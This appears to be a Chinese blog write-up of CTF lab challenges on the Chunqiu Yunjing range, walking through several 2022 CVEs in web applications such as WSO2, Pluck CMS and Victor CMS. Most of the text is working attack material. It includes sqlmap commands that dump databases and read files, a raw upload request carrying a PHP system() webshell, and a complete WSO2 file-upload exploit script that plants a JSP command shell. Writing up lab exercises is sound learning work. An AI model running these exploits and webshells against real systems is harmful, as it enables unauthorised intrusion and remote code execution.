春秋云镜wp day1 (qq.com) 建议关注公众号
websec.space,以后文章来csdn备份一份
今天看到之前买了内网渗透那本书,今天看到靶场上线了,打一天玩一下,总体cve的洞很好刷,比打CTF轻松多了。
CVE-2022-32991
首先登陆,点击第二个start,抓包并保存到一个txt
python sqlmap.py -r 1.txt --dbs --random-agent -p eid
获取flag
python sqlmap.py -r 1.txt -D ctf -T flag -C flag --dump --random-agent -p eid
Web Based Quiz System v1.0 is vulnerable to SQL Injection via welcome.php · 语雀 (yuque.com)
CVE-2022-30887
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
poc
POST /php_action/editProductImage.php?id=1 HTTP/1.1
Host: eci-2zegbcou4c05rxuhfujv.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------208935235035266125502673738631
Content-Length: 556
Connection: close
Cookie: PHPSESSID=t1jo541l52f76t9upiu0pbqv0c
Upgrade-Insecure-Requests: 1
-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="old_image"
-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="productImage"; filename="shell.php"
Content-Type: image/jpeg
<?php
if($_REQUEST['s']) {
system($_REQUEST['s']);
} else phpinfo();
?>
</pre>
</body>
</html>
-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="btn"
-----------------------------208935235035266125502673738631--
访问/assets/myimages/shell.php
CVE-2022-28525
ED01-CMS v20180505 存在任意文件上传漏洞
admin admin登陆,直接在头像上传处上传webshell
访问/images/shell.php
CVE-2022-29464
WSO2文件上传漏洞(CVE-2022-29464)是Orange Tsai发现的WSO2上的严重漏洞。该漏洞是一种未经身份验证的无限制任意文件上传,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得RCE。
import requests, urllib3, sys
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
if len(sys.argv) != 3:
print(f"Usage: python3 {sys.argv[0]} https://host shell.jsp")
exit()
host, file = sys.argv[1:]
shell = """<FORM>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
} catch(IOException e) { e.printStackTrace(); }
}
%>
<pre><%=output %></pre>"""
files = {f"../../../../repository/deployment/server/webapps/authenticationendpoint/{file}": shell}
response = requests.post(f'{host}/fileupload/toolsAny', files=files, verify=False)
print(f"shell @ {host}/authenticationendpoint/{file}")
CVE-2022-29464/exploit.py at main · hakivvi/CVE-2022-29464 (github.com)
访问,获取flag
CVE-2022-28512
Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客,它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能,您无需接触任何代码即可启动并运行您的博客。 该CMS的/single.php路径下,id参数存在一个SQL注入漏洞。
-
MISC:https://github.com/JiuBanSec/CVE/blob/main/Fantastic%20Blog%20CMS/SQL1.md
-
MISC:https://www.sourcecodester.com/php/12258/fantastic-blog-cms-php.html
找到细节,直接放进sqlmap跑出flag
python sqlmap.py -u http://eci-2zeg7t9zem78xthlwwim.cloudeci1.ichunqiu.com/single.php?id=1 --dbs
python sqlmap.py -u http://eci-2zeg7t9zem78xthlwwim.cloudeci1.ichunqiu.com/single.php?id=1 -D ctf -T flag -C flag --dump
CVE-2022-28060
Victor CMS v1.0 /includes/login.php 存在sql注入
库名
available databases [5]: [*] information_schema [*] mysql [*] performance_schema [*] php_cms [*] sys
表名php_cms
Database: php_cms [4 tables] +------------+ | categories | | comments | | posts | | users | +------------+
users列名
+----------------+--------------+ | Column | Type | +----------------+--------------+ | user_email | varchar(255) | | user_firstname | varchar(255) | | user_id | int(3) | | user_lastname | varchar(255) | | user_name | varchar(255) | | user_password | varchar(255) | +----------------+--------------+
post
[10 columns] +--------------------+--------------+ | Column | Type | +--------------------+--------------+ | post_author | varchar(255) | | post_category_id | int(3) | | post_comment_count | varchar(255) | | post_content | text | | post_date | date | | post_id | int(3) | | post_image | text | | post_status | varchar(255) | | post_tags | varchar(300) | | post_title | varchar(255) | +--------------------+--------------+
Database: php_cms Table: categories [2 columns] +-----------+--------------+ | Column | Type | +-----------+--------------+ | cat_id | int(11) | | cat_title | varchar(255) | +-----------+--------------+
Database: php_cms Table: comments [7 columns] +-----------------+--------------+ | Column | Type | +-----------------+--------------+ | comment_author | varchar(255) | | comment_content | text | | comment_date | date | | comment_email | varchar(255) | | comment_id | int(3) | | comment_post_id | int(3) | | comment_status | varchar(255) | +-----------------+--------------+
感觉思路不对,试试读文件
python3 sqlmap.py -r 1.txt --file-read "/flag" --dbms Mysql
CVE-2022-26201
Victor CMS v1.0 存在二次注入漏洞
sql注入的题目能用sqlmap梭哈就不动手了
找到注入点
CVE-2022-26965
Pluck-CMS-Pluck-4.7.16 后台RCE
admin admin登陆
添加themes
https://github.com/pluck-cms/themes
下载下来后,为了防止有什么不一样直接用网上公开的,选择bestfriends
在info.php里面写入一句话木马
上传bestfirends之后访问
访问/data/themes/bestfriends/info.php
成功执行
CVE-2022-25488
Atom CMS v2.0存在sql注入漏洞在/admin/ajax/avatar.php页面
网上搜到注入点/admin/ajax/avatar.php?id=1
直接sqlmap梭哈
python sqlmap.py -u 'http://eci-2zeganb9o0foqjjj260n.cloudeci1.ichunqiu.com/admin/ajax/avatar.php?id=1' --file-read "/flag" --dbms Mysql
217
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
